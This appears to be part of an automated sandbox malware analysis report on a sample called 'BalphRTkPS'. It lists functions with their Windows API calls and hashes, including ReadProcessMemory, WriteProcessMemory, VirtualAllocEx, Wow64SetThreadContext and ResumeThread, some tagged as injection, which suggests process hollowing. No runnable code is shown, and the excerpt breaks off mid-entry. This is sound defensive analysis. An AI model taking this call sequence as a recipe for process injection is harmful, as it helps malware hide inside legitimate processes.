                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2337996899.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74e0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DrawText
                                                                                                              • String ID:
                                                                                                              • API String ID: 2175133113-0
                                                                                                              • Opcode ID: f9f321d76d694f9842fdbf95c3012ae8c808aa795f45e802d7ec469e2092f56b
                                                                                                              • Instruction ID: 517aa0433a4ed5daf9a6c48ea5f47a16b96df6ac0e8183e1928980df6fc23a42
                                                                                                              • Opcode Fuzzy Hash: f9f321d76d694f9842fdbf95c3012ae8c808aa795f45e802d7ec469e2092f56b
                                                                                                              • Instruction Fuzzy Hash: ED31C4B590020A9FDB10CF9AD884ADEFBF9FF48324F14841AE919A7310D775A554CFA0
                                                                                                              Function 0750DB48 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 245 750db48-750dbdd ReadProcessMemory 249 750dbe6-750dc16 245->249 250 750dbdf-750dbe5 245->250 250->249
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0750DBD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 4c4394935dd85ab0323a69161c100e338b220d582fe60dbd9253db2ccebfd3c9
                                                                                                              • Instruction ID: 26c3e1fc77fcb11092be76fc40e447598d6ba20895f66248c869e8e3318617ba
                                                                                                              • Opcode Fuzzy Hash: 4c4394935dd85ab0323a69161c100e338b220d582fe60dbd9253db2ccebfd3c9
                                                                                                              • Instruction Fuzzy Hash: F62139B29003499FDB10CFAAD881BDEBBF4FF48320F10842AE518A7240D7799950CBA5
                                                                                                              Function 0750DA60 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 235 750da60-750daae 237 750dab0-750dabc 235->237 238 750dabe-750dafd WriteProcessMemory 235->238 237->238 240 750db06-750db36 238->240 241 750daff-750db05 238->241 241->240
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0750DAF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: eb25cf20d7159ae97fe10767834b5f1f6f60ce52bcbec5632455dcfac45c6f97
                                                                                                              • Instruction ID: 53f917093368986eea429ecd47ea4140fd7096c428a386b15f6fb4e36cfbfb0c
                                                                                                              • Opcode Fuzzy Hash: eb25cf20d7159ae97fe10767834b5f1f6f60ce52bcbec5632455dcfac45c6f97
                                                                                                              • Instruction Fuzzy Hash: 072127B19003599FDF10CFAAC881BDEBBF5FF48310F10842AE919A7240D7789950CBA5
                                                                                                              Function 074E5D58 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 226 74e5d58-74e5da4 227 74e5daf-74e5dbe 226->227 228 74e5da6-74e5dac 226->228 229 74e5dc3-74e5dfc DrawTextExW 227->229 230 74e5dc0 227->230 228->227 231 74e5dfe-74e5e04 229->231 232 74e5e05-74e5e22 229->232 230->229 231->232
                                                                                                              APIs
                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 074E5DEF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2337996899.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74e0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DrawText
                                                                                                              • String ID:
                                                                                                              • API String ID: 2175133113-0
                                                                                                              • Opcode ID: 70afe58e633a3aa81d017bbf39beecfb8d55c79b86fa47d2a1ba26ab8c563488
                                                                                                              • Instruction ID: 33d1fc63e8ff153576b423bbb0c0107332af5b9be79764eace6be39bdf0eddbf
                                                                                                              • Opcode Fuzzy Hash: 70afe58e633a3aa81d017bbf39beecfb8d55c79b86fa47d2a1ba26ab8c563488
                                                                                                              • Instruction Fuzzy Hash: ED21A3B590034A9FDB10CF9AD884ADEFBF9FB48324F14842AE919A7310D775A554CFA0
                                                                                                              Function 0750D4B8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 254 750d4b8-750d50b 257 750d51b-750d51e 254->257 258 750d50d-750d519 254->258 259 750d525-750d54b Wow64SetThreadContext 257->259 258->257 260 750d554-750d584 259->260 261 750d54d-750d553 259->261 261->260
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0750D53E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: e7b78b7a1ff0aba888ef6c4549ed12b545047af1fefd5f1addfa61c5485dfef2
                                                                                                              • Instruction ID: 694045fdb3e1b518b9e2798a5565229b31e65e379da9069f1673eea8d140c9d9
                                                                                                              • Opcode Fuzzy Hash: e7b78b7a1ff0aba888ef6c4549ed12b545047af1fefd5f1addfa61c5485dfef2
                                                                                                              • Instruction Fuzzy Hash: 0A217CB19003098FDB10DFAAC4817EEBBF4FF88324F14842AD959A7240D778A945CFA1
                                                                                                              Function 012AD808 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 271 12ad808-12ad80b 272 12ad810-12ad8a4 DuplicateHandle 271->272 273 12ad8ad-12ad8ca 272->273 274 12ad8a6-12ad8ac 272->274 274->273
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD7D6,?,?,?,?,?), ref: 012AD897
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 2470c2437407905d0a0fb37b47c293211e759a1d334751da76b8cc603c1479fb
                                                                                                              • Instruction ID: 35d168ec767f5ee634f3f1f9fa0d5f2d3f1eaecb952edb5f7c4ff4ab62c84cb9
                                                                                                              • Opcode Fuzzy Hash: 2470c2437407905d0a0fb37b47c293211e759a1d334751da76b8cc603c1479fb
                                                                                                              • Instruction Fuzzy Hash: 1821E3B59002099FDB10CF9AD985ADEBFF4FB48320F14841AE918A3350D378A955CF65
                                                                                                              Function 012ABCA0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 265 12abca0-12ad8a4 DuplicateHandle 267 12ad8ad-12ad8ca 265->267 268 12ad8a6-12ad8ac 265->268 268->267
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD7D6,?,?,?,?,?), ref: 012AD897
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 0512bcdac6db94fabfd874e23ca81da2f27a9cde64e2ab6fe16a061d0d08e905
                                                                                                              • Instruction ID: 7812b47b342e5a1a4e1206b19ac8a8a25caca5c5fabf79c36a63d08868ff4b7f
                                                                                                              • Opcode Fuzzy Hash: 0512bcdac6db94fabfd874e23ca81da2f27a9cde64e2ab6fe16a061d0d08e905
                                                                                                              • Instruction Fuzzy Hash: 592103B5900209DFDB10CFAAD884ADEBBF4EB48320F10841AE918A3310D374A954CFA0
                                                                                                              Function 0750D4C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 277 750d4c0-750d50b 279 750d51b-750d54b Wow64SetThreadContext 277->279 280 750d50d-750d519 277->280 282 750d554-750d584 279->282 283 750d54d-750d553 279->283 280->279 283->282
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0750D53E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 9fc04f45a88b9b4f9703012e1dbb7f0b1521f7f816e98a360ccf73768ecd7615
                                                                                                              • Instruction ID: b01b5e8029b4351886b867cf031b9386c0b6556d4f3a8e52ab97fc121560aae2
                                                                                                              • Opcode Fuzzy Hash: 9fc04f45a88b9b4f9703012e1dbb7f0b1521f7f816e98a360ccf73768ecd7615
                                                                                                              • Instruction Fuzzy Hash: 70212CB19003099FDB10DFAAC4857EEBBF4FF88314F14842AD559A7240D7789545CFA5
                                                                                                              Function 0750DB50 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 287 750db50-750dbdd ReadProcessMemory 290 750dbe6-750dc16 287->290 291 750dbdf-750dbe5 287->291 291->290
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0750DBD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: a3e5b058f07a75bc0409d9ddbdf6eb6e0a770a8fb3ac0a31ede08015814576ab
                                                                                                              • Instruction ID: 7a4c9a3e55600176c819b1184e368e73910bdb06bae6c326bd7f016559be6591
                                                                                                              • Opcode Fuzzy Hash: a3e5b058f07a75bc0409d9ddbdf6eb6e0a770a8fb3ac0a31ede08015814576ab
                                                                                                              • Instruction Fuzzy Hash: DE2128B19003599FDB10CFAAC881BDEBBF5FF48310F10842AE518A7240D7799910CBA5
                                                                                                              Function 0750D999 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0750DA0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 738fd50758428a83f7c491b1002094546039ca6cb2e4302c95b57615e4be5be6
                                                                                                              • Instruction ID: 2a834c29a8500301518254fb64a8b1622009e30aa5882433426aaaa813bec364
                                                                                                              • Opcode Fuzzy Hash: 738fd50758428a83f7c491b1002094546039ca6cb2e4302c95b57615e4be5be6
                                                                                                              • Instruction Fuzzy Hash: 031156769003099FDB10CFAAD840BDEBBF5EF88320F148419E519A7250CB75A550CBA1
                                                                                                              Function 0750D408 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 96e2a597005dca0b8b8e6150a4667db0b2c117dc068092bf1b0cb31ed15e63e3
                                                                                                              • Instruction ID: ec9a4954a9a7b0bb62ee4ca693e6c206fee37aa48f1aec85f0edee034b9fec88
                                                                                                              • Opcode Fuzzy Hash: 96e2a597005dca0b8b8e6150a4667db0b2c117dc068092bf1b0cb31ed15e63e3
                                                                                                              • Instruction Fuzzy Hash: 66117CB19003498FDB10DFAAD8457DEFBF4EF88224F14841AD119A7240C7756540CBA1
                                                                                                              Function 0750D9A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0750DA0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: a289cd5bdd4de8b1284ea517b1e0bb3408bec26461a9360ddb4451226bf6c07d
                                                                                                              • Instruction ID: 642fae6262a232a609cb560c109e30088355e0c78cd7b869542bed5e0c616f3f
                                                                                                              • Opcode Fuzzy Hash: a289cd5bdd4de8b1284ea517b1e0bb3408bec26461a9360ddb4451226bf6c07d
                                                                                                              • Instruction Fuzzy Hash: 3F1156729003499FDB10CFAAC844BDEBBF5EF88320F148819E519A7250CB75A550CBA1
                                                                                                              Function 075C041A Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 075C047D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338736594.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_75c0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 4eb533a8988091421db3aa6b01b1e921682fd97999adbbd20473c0f24b99d7d2
                                                                                                              • Instruction ID: c55e547e06d3e584cb21adcc80fb0b5f5d9a2abdbbbc18f1c880b66a2dcc73c7
                                                                                                              • Opcode Fuzzy Hash: 4eb533a8988091421db3aa6b01b1e921682fd97999adbbd20473c0f24b99d7d2
                                                                                                              • Instruction Fuzzy Hash: 071113B58043099FDB10CF9AD885BDEBBF8FB48320F20841AE558A7240C375A544CFA1
                                                                                                              Function 0750D410 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: d6b6ad8c7417444098fb73b89e995eba49f8950b49f21e0656de29cdb1a6ad43
                                                                                                              • Instruction ID: 4fd0bbf29e9383ae438898963f2677fa2409901b2efbb923d50f3048933caf89
                                                                                                              • Opcode Fuzzy Hash: d6b6ad8c7417444098fb73b89e995eba49f8950b49f21e0656de29cdb1a6ad43
                                                                                                              • Instruction Fuzzy Hash: 95113AB1D003498FDB20DFAAD4457DEFBF4EF88724F248419D519A7240CBB5A540CBA5
                                                                                                              Function 012AB118 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 012AB17E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 7df7b463f034d7df047f4e020f2d6fa250c8ef7464bc5514ac806f3e45033663
                                                                                                              • Instruction ID: bd1c256196f606cac8548c236199bd246312bafb57891c8af660a077b9f5c460
                                                                                                              • Opcode Fuzzy Hash: 7df7b463f034d7df047f4e020f2d6fa250c8ef7464bc5514ac806f3e45033663
                                                                                                              • Instruction Fuzzy Hash: B211DFB6C007498FDB20CF9AD844B9EFBF4EB88724F10841AD519A7210D3B9A545CFA1
                                                                                                              Function 075C0420 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 075C047D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338736594.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_75c0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 4d1f7432fe98b16a55810131cd0a2a8d2ada9100d18f06b061c22e1c1799a280
                                                                                                              • Instruction ID: 3b5e46186852d941cf9d4c8c32bc524231cd44e6124cc43a307e0dd69720bbb4
                                                                                                              • Opcode Fuzzy Hash: 4d1f7432fe98b16a55810131cd0a2a8d2ada9100d18f06b061c22e1c1799a280
                                                                                                              • Instruction Fuzzy Hash: DD1103B5800359DFDB10CF9AD884BDEBBF8FB48320F10841AD558A7250C3B5A544CFA1
                                                                                                              Function 0124D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333195757.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_124d000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 603b00d4a2f92c4010efca2fed1e8c5cda1f8839f63df3273b0d9cb52eae4108
                                                                                                              • Instruction ID: fb90da1f6d05090d508ac0df78f2686abebc4dfcb2a9fa40a1f6bf7f21b04112
                                                                                                              • Opcode Fuzzy Hash: 603b00d4a2f92c4010efca2fed1e8c5cda1f8839f63df3273b0d9cb52eae4108
                                                                                                              • Instruction Fuzzy Hash: 4B216A76510208DFDB09DF54D9C0B66BF65FB94324F20C16CEA0A0B257C37AE456CBA1
                                                                                                              Function 0125D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333262901.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_125d000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fc661bcda965d8ac8d805ab0973bb474c656289e88563311099e66fdd7c35bc3
                                                                                                              • Instruction ID: 07a7ab626f7cd3bda2776c7dec0b5fee78507d094cc77f4abe36e39d82292f4e
                                                                                                              • Opcode Fuzzy Hash: fc661bcda965d8ac8d805ab0973bb474c656289e88563311099e66fdd7c35bc3
                                                                                                              • Instruction Fuzzy Hash: C2214675524308EFDB45DF94D9C0B26BBA1FB84324F20C56DEE098B253C7B6D846CA61
                                                                                                              Function 0125D01C Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333262901.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_125d000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7de31fe678dcac04aeced43e9c7e83a179286bed1ef1d7085e77075372f67921
                                                                                                              • Instruction ID: 304550dd097f50b7b59b7345009841c63e2f705aab28a80fe5f8d82ad416b7e8
                                                                                                              • Opcode Fuzzy Hash: 7de31fe678dcac04aeced43e9c7e83a179286bed1ef1d7085e77075372f67921
                                                                                                              • Instruction Fuzzy Hash: 2E212275624208EFDB55DF64D9C0B26BB61FB84314F20C56DDE0A4B252C37AD407CA61
                                                                                                              Function 0125D006 Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333262901.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_125d000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 97caff8a68c650a3d31b4513614c7dba1828b9c707e26e8899a1954a8b1ab7e0
                                                                                                              • Instruction ID: f694e998d4b887fdbac13757aae26a87fc4a85cfc6d008aee191e8f84d375367
                                                                                                              • Opcode Fuzzy Hash: 97caff8a68c650a3d31b4513614c7dba1828b9c707e26e8899a1954a8b1ab7e0
                                                                                                              • Instruction Fuzzy Hash: 38219D755093848FDB02CF24D9D0B15BF71EB46314F28C5EAD9498B2A7C33AD80ACB62
                                                                                                              Function 0124D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333195757.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_124d000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                              • Instruction ID: c2115975d72402675f5b20633aed71bc88b2fa7679637ed3ae7e3951d155bf39
                                                                                                              • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                              • Instruction Fuzzy Hash: A11126B6404284CFCB06CF54D5C0B56BF71FB94324F24C2A9D9090B257C33AE456CBA1
                                                                                                              Function 0125D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333262901.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_125d000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                              • Instruction ID: d8fae129b5f23bf2935a9fbe817902308342e2843336e3ed88dbc15a88fc9f47
                                                                                                              • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                              • Instruction Fuzzy Hash: 3911BB75504284DFDB02CF54C5C0B15BBA1FB84224F24C6ADDD498B2A7C33AD44ACB61

                                                                                                              Non-executed Functions

                                                                                                              Function 0750C977 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: |_6b
                                                                                                              • API String ID: 0-1307392180
                                                                                                              • Opcode ID: 788550454b8553fb4be7589d417090f0240a0d4092dbf77043bf309638e90020
                                                                                                              • Instruction ID: 1a9292f3c8e1e3728a78f287a2279be7c0b3355c4073a90d48dc05e5f9695e8d
                                                                                                              • Opcode Fuzzy Hash: 788550454b8553fb4be7589d417090f0240a0d4092dbf77043bf309638e90020
                                                                                                              • Instruction Fuzzy Hash: 49D14EB1E00255CFDB14CF58C5846EDBBF2BB8A305F64866AD418AB291D735DD42CBA0
                                                                                                              Function 0750CBE8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: |_6b
                                                                                                              • API String ID: 0-1307392180
                                                                                                              • Opcode ID: 6177dd0bd00a5388afe19d013d0dd4f7c077883a32f04a262969174902ece09d
                                                                                                              • Instruction ID: 4e2f31d43fad88c15a185294abaad2e72d3667b614aa10a3be4f623926dbdc2c
                                                                                                              • Opcode Fuzzy Hash: 6177dd0bd00a5388afe19d013d0dd4f7c077883a32f04a262969174902ece09d
                                                                                                              • Instruction Fuzzy Hash: 96E10CB4E002598FDB14DFA9D590AAEFBB2FF89304F248269D414A7355D734AD42CFA0
                                                                                                              Function 0750B7E0 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ca7fd2de4e06cf2e2d80f117c06dcb7cf6d57791ec5b9ccdb58150d193b500a
                                                                                                              • Instruction ID: 46a832709bd2c6dbd11b806080d683884fd9e08d6337c6e377996ea84317f75b
